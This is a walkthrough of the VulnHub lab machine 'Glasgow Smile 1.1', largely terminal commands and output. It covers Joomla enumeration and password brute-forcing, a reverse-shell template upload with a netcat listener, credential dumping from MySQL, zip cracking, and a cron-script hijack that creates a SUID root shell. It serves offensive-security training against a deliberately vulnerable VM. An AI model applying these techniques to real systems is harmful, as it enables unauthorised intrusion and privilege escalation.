Recon
NMAP Complete Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
# Nmap 7.92 scan initiated Tue Jan 25 18:30:16 2022 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /root/vulnHub/Glasglow-Smile-1.1/192.168.1.1/scans/tcp80/tcp_80_http_nmap.txt -oX /root/vulnHub/Glasglow-Smile-1.1/192.168.1.1/scans/tcp80/xml/tcp_80_http_nmap.xml 192.168.1.1
Nmap scan report for 192.168.1.1
Host is up, received arp-response (0.00019s latency).
Scanned at 2022-01-25 18:30:17 +08 for 17s
Bug in http-security-headers: no string output.
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
|_http-errors: Couldn't find any error pages.
| http-headers:
| Date: Tue, 25 Jan 2022 10:30:24 GMT
| Server: Apache/2.4.38 (Debian)
| Last-Modified: Sat, 13 Jun 2020 18:53:52 GMT
| ETag: "7d-5a7fbb701d4b6"
| Accept-Ranges: bytes
| Content-Length: 125
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
|
|_ (Request type: HEAD)
|_http-feed: Couldn't find any feeds.
|_http-config-backup: ERROR: Script execution failed (use -d to debug)
|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
| http-sitemap-generator:
| Directory structure:
| /
| Other: 1; jpg: 1
| Longest directory structure:
| Depth: 0
| Dir: /
| Total files found (by extension):
|_ Other: 1; jpg: 1
|_http-referer-checker: Couldn't find any cross-domain scripts.
|_http-comments-displayer: Couldn't find any comments.
|_http-server-header: Apache/2.4.38 (Debian)
| http-useragent-tester:
| Status for browser useragent: 200
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-mobileversion-checker: No mobile version detected.
|_http-chrono: Request times for /; avg: 161.31ms; min: 149.31ms; max: 207.34ms
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
| http-vhosts:
|_128 names had status 200
|_http-malware-host: Host appears to be clean
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-title: Site doesn't have a title (text/html).
|_http-exif-spider: ERROR: Script execution failed (use -d to debug)
|_http-fetch: Please enter the complete path of the directory to save data in.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
| http-php-version: Logo query returned unknown hash 91f9a8dbb5d9f959d393e53c5dada8fa
|_Credits query returned unknown hash 91f9a8dbb5d9f959d393e53c5dada8fa
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-date: Tue, 25 Jan 2022 10:30:23 GMT; -30m01s from local time.
MAC Address: 00:0C:29:4F:F2:DE (VMware)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 25 18:30:34 2022 -- 1 IP address (1 host up) scanned in 18.68 seconds
TCP/80 (HTTP)
FFUF
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(root💀kali)-[~/vulnHub/GoldenEye-1]
└─# ffuf -u http://$ip/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php'
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.1.1/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.html [Status: 200, Size: 125, Words: 7, Lines: 9]
index.html [Status: 200, Size: 125, Words: 7, Lines: 9]
joomla [Status: 301, Size: 311, Words: 20, Lines: 10]
server-status [Status: 403, Size: 276, Words: 20, Lines: 10]
:: Progress: [18460/18460] :: Job [1/1] :: 318 req/sec :: Duration: [0:00:05] :: Errors: 0 ::
- View to enumerated directories
index.html
joomla
- Enumerate joomla
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47
┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1] └─# joomscan --url http://$ip/joomla -ec [+] FireWall Detector [++] Firewall not detected [+] Detecting Joomla Version [++] Joomla 3.7.3rc1 [+] Core Joomla Vulnerability [++] Target Joomla core is not vulnerable [+] Checking Directory Listing [++] directory has directory listing : http://192.168.1.1/joomla/administrator/components http://192.168.1.1/joomla/administrator/modules http://192.168.1.1/joomla/administrator/templates http://192.168.1.1/joomla/images/banners [+] Checking apache info/status files [++] Readable info/status files are not found [+] admin finder [++] Admin page : http://192.168.1.1/joomla/administrator/ [+] Checking robots.txt existing [++] robots.txt is found path : http://192.168.1.1/joomla/robots.txt Interesting path found from robots.txt http://192.168.1.1/joomla/joomla/administrator/ http://192.168.1.1/joomla/administrator/ http://192.168.1.1/joomla/bin/ http://192.168.1.1/joomla/cache/ http://192.168.1.1/joomla/cli/ http://192.168.1.1/joomla/components/ http://192.168.1.1/joomla/includes/ http://192.168.1.1/joomla/installation/ http://192.168.1.1/joomla/language/ http://192.168.1.1/joomla/layouts/ http://192.168.1.1/joomla/libraries/ http://192.168.1.1/joomla/logs/ http://192.168.1.1/joomla/modules/ http://192.168.1.1/joomla/plugins/ http://192.168.1.1/joomla/tmp/
http://192.168.1.1/joomla/administrator/index.php
robots.txt
- Viewed all directories in
robots.txt
, could not find anything - Try a bruteforce attack as a last resort
- Generate a custom wordlist w/ cewl
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/exploit/joomla] └─# cewl http://192.168.1.1/joomla/index.php -w passwords.txt CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/) ┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/exploit/joomla] └─# cat >> usernames.txt << EOF > Joker > joker > Arthur > arthur > Rob > rob > admin > joomla > EOF
- Bruteforce Joomla CMS
- Hydra/Burp did not work due to a unqiue token being generated
- https://www.securityartwork.es/2013/02/14/nmap-script-http-joomla-brute-where-thc-hydra-doesnt-fit/
- NMAP Script:
http-joomla-brute
,- https://nmap.org/nsedoc/scripts/http-joomla-brute.html
http-joomla-brute.uri
:- specify path to
/administrator/index.php
- specify path to
- CMSeek
- https://github.com/Tuhinshubhra/CMSeeK
- Hydra/Burp did not work due to a unqiue token being generated
- Bruteforce w/ nmap script
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/exploit/joomla] └─# nmap -p80 --script http-joomla-brute 192.168.1.1 --script-args 'userdb=/root/vulnHub/Glasglow-Smile-1.1/192.168.1.1/exploit/joomla/usernames.txt,passdb=/root/vulnHub/Glasglow-Smile-1.1/192.168.1.1/exploit/joomla/passwords.txt,brute.firstonly=true,http-joomla-brute.uri=/joomla/administrator/index.php,http-joomla-brute.threads=5' Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-26 02:10 +08 Nmap scan report for 192.168.1.1 Host is up (0.00027s latency). PORT STATE SERVICE 80/tcp open http | http-joomla-brute: | Accounts: | joomla:Gotham - Valid credentials |_ Statistics: Performed 1342 guesses in 91 seconds, average tps: 14.4 MAC Address: 00:0C:29:4F:F2:DE (VMware) Nmap done: 1 IP address (1 host up) scanned in 91.21 seconds
- Bruteforce w/ CMSeek
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
___ _ _ ____ ____ ____ _ _ | |\/| [__ |___ |___ |_/ by @r3dhax0r |___ | | ___| |___ |___ | \_ Version 1.1.3 K-RONA [+] Joomla Bruteforce Module [+] Enter target site (https://example.tld): http://192.168.1.1/joomla [i] Checking for Joomla [*] Joomla Confirmed... Confirming form and getting token... [~] Enter Usernames with coma as separation without any space (example: cris,harry): joomla [i] Bruteforcing User: joomla [*] Testing Password: Gothamlkyesed [*] Password found! | |--[username]--> joomla | |--[password]--> Gotham | [*] Enjoy The Hunt! [*] Credentials stored at: /usr/share/cmseek/Result/192.168.1.1_joomla/bruteforce_result_joomla_.txt
- joomla:Gotham
- Proceed to
http://192.168.1.1/joomla/administrator/index.php?option=com_templates
- Upload reverse shell by editing
/error.php
in template “protostar” - Execute reverse shell at
http://192.168.1.1/joomla/templates/beez3/error.php
- Obtain www-data shell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
┌──(root💀kali)-[~/tools] └─# nc -nvlp 4444 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 192.168.1.1. Ncat: Connection from 192.168.1.1:55604. Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux 14:48:46 up 1:42, 0 users, load average: 0.08, 0.09, 0.09 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off whoami www-data $
Privilege Escalation
Rob - Via SQL Creds Found
- Find SQL Credentials
1 2 3
www-data@glasgowsmile:/var/www$ cd /joomla2 www-data@glasgowsmile:/var/www/joomla2$ ls www-data@glasgowsmile:/var/www/joomla2$ cat configuration.php
- joomla:babyjoker
- Access MySQL,
- Obtain more creds from
joomla_db
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32
www-data@glasgowsmile:/var/www/joomla2$ mysql -u joomla -p Enter password: babyjoker Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 15726 Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10 Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> show databases; +--------------------+ | Database | +--------------------+ | batjoke | | information_schema | | joomla_db | | mysql | | performance_schema | +--------------------+ 5 rows in set (0.000 sec) MariaDB [(none)]> use joomla_db Database changed MariaDB [joomla_db]> SELECT username,password from jnqcu_users; +----------+--------------------------------------------------------------+ | username | password | +----------+--------------------------------------------------------------+ | joomla | $2y$10$9.svWPvNCg0qoD1mf8NJFe1SHltICeEvVS7alBkG3M3aFoPFge9yu | +----------+--------------------------------------------------------------+ 1 row in set (0.001 sec)
- No new creds
- Obtain credentials from
batjoke
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29
MariaDB [joomla_db]> use batjoke Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MariaDB [batjoke]> show tables; +-------------------+ | Tables_in_batjoke | +-------------------+ | equipment | | taskforce | +-------------------+ 2 rows in set (0.000 sec) MariaDB [batjoke]> select * from equipment; Empty set (0.000 sec) MariaDB [batjoke]> select * from taskforce; +----+---------+------------+---------+----------------------------------------------+ | id | type | date | name | pswd | +----+---------+------------+---------+----------------------------------------------+ | 1 | Soldier | 2020-06-14 | Bane | YmFuZWlzaGVyZQ== | | 2 | Soldier | 2020-06-14 | Aaron | YWFyb25pc2hlcmU= | | 3 | Soldier | 2020-06-14 | Carnage | Y2FybmFnZWlzaGVyZQ== | | 4 | Soldier | 2020-06-14 | buster | YnVzdGVyaXNoZXJlZmY= | | 6 | Soldier | 2020-06-14 | rob | Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ | | 7 | Soldier | 2020-06-14 | aunt | YXVudGlzIHRoZSBmdWNrIGhlcmU= | +----+---------+------------+---------+----------------------------------------------+ 6 rows in set (0.000 sec)
- password is base64 encoded
- Obtain more creds from
- Decode password
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35
┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot] └─# cat creds | cut -d '|' -f5 | sed 's/+\|-\|name//g' | awk 'NF' | tee usernames.txt Bane Aaron Carnage buster rob aunt ┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot] └─# cat creds | cut -d '|' -f6 | sed 's/+\|-\|pswd//g' | awk 'NF' | tee base64encoded.txt YmFuZWlzaGVyZQ== YWFyb25pc2hlcmU= Y2FybmFnZWlzaGVyZQ== YnVzdGVyaXNoZXJlZmY= Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ YXVudGlzIHRoZSBmdWNrIGhlcmU= ┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot] └─# for x in $(<base64encoded.txt); do echo -n $x | base64 -d; echo ""; done | tee base64decoded.txt baneishere aaronishere carnageishere busterishereff ???AllIHaveAreNegativeThoughts??? auntis the fuck here ┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot] └─# paste -d ":" usernames.txt base64decode.txt Bane :baneishere Aaron :aaronishere Carnage :carnageishere buster :busterishereff rob :???AllIHaveAreNegativeThoughts??? aunt :auntis the fuck here
- Extract usernames from
/etc/passwd
1 2 3 4
www-data@glasgowsmile:/home$ awk -F: '($3>=1000)&&($1!="nobody"){print $1}' /etc/passwd rob abner penguin
- Switch to user to rob
- User Flag
1 2 3
rob@glasgowsmile:~$ cat user.txt JKR[f5bb11acbb957915e421d62e7253d27a] rob@glasgowsmile:~$
Abner - Via Ciphertext
- View files in rob’s home directory
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
rob@glasgowsmile:~$ ls -la total 52 drwxr-xr-x 3 rob rob 4096 Jun 16 2020 . drwxr-xr-x 5 root root 4096 Jun 15 2020 .. -rw-r----- 1 rob rob 454 Jun 14 2020 Abnerineedyourhelp -rw------- 1 rob rob 113 Jan 26 16:18 .bash_history -rw-r--r-- 1 rob rob 220 Jun 13 2020 .bash_logout -rw-r--r-- 1 rob rob 3526 Jun 13 2020 .bashrc -rw-r----- 1 rob rob 313 Jun 14 2020 howtoberoot drwxr-xr-x 3 rob rob 4096 Jun 13 2020 .local -rw------- 1 rob rob 81 Jun 15 2020 .mysql_history -rw-r--r-- 1 rob rob 807 Jun 13 2020 .profile -rw-r--r-- 1 rob rob 66 Jun 15 2020 .selected_editor -rw-r----- 1 rob rob 38 Jun 13 2020 user.txt -rw------- 1 rob rob 429 Jun 16 2020 .Xauthority rob@glasgowsmile:~$
bash_history
Abnerineedyourhelp
howtoberoot
.local
- View the files
.bash_history
- Nothing Found
Abnerineedyourhelp
1 2 3
rob@glasgowsmile:~$ cat Abnerineedyourhelp Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, "Sgd vnqrs ozqs ne gzuhmf z ldmszk hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's." Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd dmhflz. RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ==
.local
- Nothing Found
howtoberoot
1 2 3 4 5 6 7 8
rob@glasgowsmile:~$ cat howtoberoot _____ ______ __ _ _ _ ____ ____ _____ ____ |_ _| _ \ \ / / | | | | / \ | _ \| _ \| ____| _ \ | | | |_) \ V / | |_| | / _ \ | |_) | | | | _| | |_) | | | | _ < | | | _ |/ ___ \| _ <| |_| | |___| _ < |_| |_| \_\|_| |_| |_/_/ \_\_| \_\____/|_____|_| \_\ NO HINTS.
- Decipher ciphertext
1 2 3
Hello Dear, Arthur suffers from severe mental illness but we see little sympathy for his condition. This relates to his feeling about being ignored. You can find an entry in his journal reads, "The worst part of having a mental illness is people expect you to behave as if you don't." Now I need your help Abner, use this password, you will find the right way to solve the enigma. STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==
- Decode base64 encoded text
1 2 3 4
┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot] └─# echo -n STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA== | base64 -d I33hope99my0death000makes44more8cents00than0my0life0
- Switch to user abner
- User Flag 2
1 2
abner@glasgowsmile:~$ cat user2.txt JKR{0286c47edc9bfdaf643f5976a8cfbd8d}
Penguin - Via Creds Found + Cracking Zip file
- View files in abner home directory
1 2 3 4 5 6 7 8 9 10 11 12 13 14
abner@glasgowsmile:~$ ls -la total 44 drwxr-xr-x 4 abner abner 4096 Jun 16 2020 . drwxr-xr-x 5 root root 4096 Jun 15 2020 .. -rw------- 1 abner abner 167 Jan 25 13:06 .bash_history -rw-r--r-- 1 abner abner 220 Jun 14 2020 .bash_logout -rw-r--r-- 1 abner abner 3526 Jun 14 2020 .bashrc -rw-r----- 1 abner abner 565 Jun 16 2020 info.txt drwxr-xr-x 3 abner abner 4096 Jun 14 2020 .local -rw-r--r-- 1 abner abner 807 Jun 14 2020 .profile drwx------ 2 abner abner 4096 Jun 15 2020 .ssh -rw-r----- 1 abner abner 38 Jun 16 2020 user2.txt -rw------- 1 abner abner 399 Jun 15 2020 .Xauthority abner@glasgowsmile:~$
.bash_history
info.txt
- View the files
info.txt
1 2 3 4
abner@glasgowsmile:~$ cat info.txt A Glasgow smile is a wound caused by making a cut from the corners of a victim's mouth up to the ears, leaving a scar in the shape of a smile. The act is usually performed with a utility knife or a piece of broken glass, leaving a scar which causes the victim to appear to be smiling broadly. The practice is said to have originated in Glasgow, Scotland in the 1920s and 30s. The attack became popular with English street gangs (especially among the Chelsea Headhunters, a London-based hooligan firm, among whom it is known as a "Chelsea grin" or "Chelsea smile").
.bash_history
1 2 3 4 5 6 7 8 9 10 11 12 13
abner@glasgowsmile:~$ cat .bash_history whoami systemctl reboot fuck su penguin mysql -u root -p exit cd .bash/ ls unzip .dear_penguins.zip cat dear_penguins rm dear_penguins exit
.dear_penguins.zip
- Find
.dear_penguins.zip
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
abner@glasgowsmile:/home/penguin$ find / 2>/dev/null | grep penguin /home/penguin /home/penguin/.bash_history /home/penguin/.bashrc /home/penguin/.Xauthority /home/penguin/.bash_logout /home/penguin/.profile /home/penguin/SomeoneWhoHidesBehindAMask /home/penguin/SomeoneWhoHidesBehindAMask/user3.txt /home/penguin/SomeoneWhoHidesBehindAMask/find /home/penguin/SomeoneWhoHidesBehindAMask/PeopleAreStartingToNotice.txt /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old /home/penguin/.ssh /home/penguin/.local /home/penguin/.local/share /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip
/var/www/joomla2/administrator/manifests/files/.dear_penguins.zip
- View permissions of
/home/penguin/SomeoneWhoHidesBehindAMask
1 2 3 4 5 6 7 8
abner@glasgowsmile:/home/penguin$ ls -l SomeoneWhoHidesBehindAMask/ ls: cannot access 'SomeoneWhoHidesBehindAMask/user3.txt': Permission denied ls: cannot access 'SomeoneWhoHidesBehindAMask/find': Permission denied ls: cannot access 'SomeoneWhoHidesBehindAMask/PeopleAreStartingToNotice.txt': Permission denied total 0 -????????? ? ? ? ? ? find -????????? ? ? ? ? ? PeopleAreStartingToNotice.txt -????????? ? ? ? ? ? user3.txt
- Unzip
dear_penguins.zip
- There is a password
- Create wordlist w/
info.txt
1 2
┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot/zip] └─# cewl localhost/info.txt -w cewl_info.txt
- Compile all passwords we have
1 2 3 4 5 6 7 8 9
┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot/zip] └─# cp ../sql/base64decode.txt . ┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot/zip] └─# cat base64decode.txt cewl_info.txt passwords.txt >> compiled_passwords.txt ┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot/zip] └─# echo -n I33hope99my0death000makes44more8cents00than0my0life0 >> compiled_passwords.txt
- Crack it w/ john
1 2 3 4 5
┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot/zip] └─# john john_zip --wordlist=compiled_passwords.txt Press 'q' or Ctrl-C to abort, almost any other key for status I33hope99my0death000makes44more8cents00than0my0life0 (dear_penguins.zip/dear_penguins) 1g 0:00:00:00 DONE (2022-01-27 16:45) 100.0g/s 22700p/s 22700c/s 22700C/s baneishere..Joomla
- Same password as abner
- View extracted file
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot/zip] └─# unzip dear_penguins.zip Archive: dear_penguins.zip [dear_penguins.zip] dear_penguins password: inflating: dear_penguins ┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot/zip] └─# cat dear_penguins My dear penguins, we stand on a great threshold! It's okay to be scared; many of you won't be coming back. Thanks to Batman, the time has come to punish all of God's children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!!! scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz ┌──(root💀kali)-[~/vulnHub/Glasglow-Smile-1.1/192.168.1.1/loot/zip] └─# echo -n scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz >> compiled_passwords.txt
- penguin:scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
- Switch to user penguin
- User Flag 3
1 2
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat user3.txt JKR{284a3753ec11a592ee34098b8cb43d52}
Root - Via Cronjob
- View files in
/home/penguin/SomeoneWhoHidesBehindAMask
1 2 3 4 5 6 7 8
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ ls -la total 332 drwxr--r-- 2 penguin penguin 4096 Jan 27 02:59 . drwxr-xr-x 5 penguin penguin 4096 Jun 16 2020 .. -rwsr-x--x 1 penguin penguin 315904 Jun 15 2020 find -rw-r----- 1 penguin root 1457 Jun 15 2020 PeopleAreStartingToNotice.txt -rwxr-xr-x 1 penguin root 664 Jan 27 02:59 .trash_old -rw-r----- 1 penguin penguin 38 Jun 16 2020 user3.txt
- find SUID Binary is useless because owner is penguin
- .trash_old
- PeopleAreStartingToNotice.txt
- View files
- Could not find any way to privilege escalate
- Assume
.trash_old
is executed by cronjob, replace it to spawn a root shell1 2 3 4 5
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ printf '#!/bin/bash\n\ncp /bin/bash /tmp/rootbash && chmod u+s /tmp/rootbash\n' > /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old; chmod 4777 /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ ls -l /tmp total 1152 -rwsr-xr-x 1 root root 1168776 Jan 27 03:07 rootbash
- Obtain root shell
- Root Flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
rootbash-5.0# cd /root rootbash-5.0# ls root.txt whoami rootbash-5.0# cat root.txt ▄████ ██▓ ▄▄▄ ██████ ▄████ ▒█████ █ █░ ██████ ███▄ ▄███▓██▓██▓ ▓█████ ██▒ ▀█▓██▒ ▒████▄ ▒██ ▒ ██▒ ▀█▒██▒ ██▓█░ █ ░█░ ▒██ ▒▓██▒▀█▀ ██▓██▓██▒ ▓█ ▀ ▒██░▄▄▄▒██░ ▒██ ▀█▄ ░ ▓██▄ ▒██░▄▄▄▒██░ ██▒█░ █ ░█ ░ ▓██▄ ▓██ ▓██▒██▒██░ ▒███ ░▓█ ██▒██░ ░██▄▄▄▄██ ▒ ██░▓█ ██▒██ ██░█░ █ ░█ ▒ ██▒██ ▒██░██▒██░ ▒▓█ ▄ ░▒▓███▀░██████▓█ ▓██▒██████▒░▒▓███▀░ ████▓▒░░██▒██▓ ▒██████▒▒██▒ ░██░██░██████░▒████▒ ░▒ ▒░ ▒░▓ ▒▒ ▓▒█▒ ▒▓▒ ▒ ░░▒ ▒░ ▒░▒░▒░░ ▓░▒ ▒ ▒ ▒▓▒ ▒ ░ ▒░ ░ ░▓ ░ ▒░▓ ░░ ▒░ ░ ░ ░░ ░ ▒ ░▒ ▒▒ ░ ░▒ ░ ░ ░ ░ ░ ▒ ▒░ ▒ ░ ░ ░ ░▒ ░ ░ ░ ░▒ ░ ░ ▒ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ Congratulations! You've got the Glasgow Smile! JKR{68028b11a1b7d56c521a90fc18252995} Credits by mindsflee
- Snoop processes w/o root privileges
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
penguin@glasgowsmile:/tmp$ ./pspy64 pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855 2022/01/27 03:13:01 CMD: UID=0 PID=13411 | /usr/sbin/CRON -f 2022/01/27 03:13:01 CMD: UID=0 PID=13412 | /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old 2022/01/27 03:13:01 CMD: UID=0 PID=13413 | /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old 2022/01/27 03:13:01 CMD: UID=0 PID=13414 | /bin/bash /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old 2022/01/27 03:13:12 CMD: UID=0 PID=13415 | 2022/01/27 03:14:01 CMD: UID=0 PID=13416 | /usr/sbin/CRON -f 2022/01/27 03:14:02 CMD: UID=0 PID=13417 | /usr/sbin/CRON -f 2022/01/27 03:14:02 CMD: UID=0 PID=13418 | /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old 2022/01/27 03:14:02 CMD: UID=0 PID=13419 | /bin/bash /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old 2022/01/27 03:15:01 CMD: UID=0 PID=13420 | /usr/sbin/CRON -f 2022/01/27 03:15:01 CMD: UID=0 PID=13421 | /usr/sbin/CRON -f 2022/01/27 03:15:01 CMD: UID=0 PID=13422 | /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old 2022/01/27 03:15:01 CMD: UID=0 PID=13423 | /bin/bash /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
- We can see that cronjob is executing
.trash_old
every minute
- We can see that cronjob is executing
Comments powered by Disqus.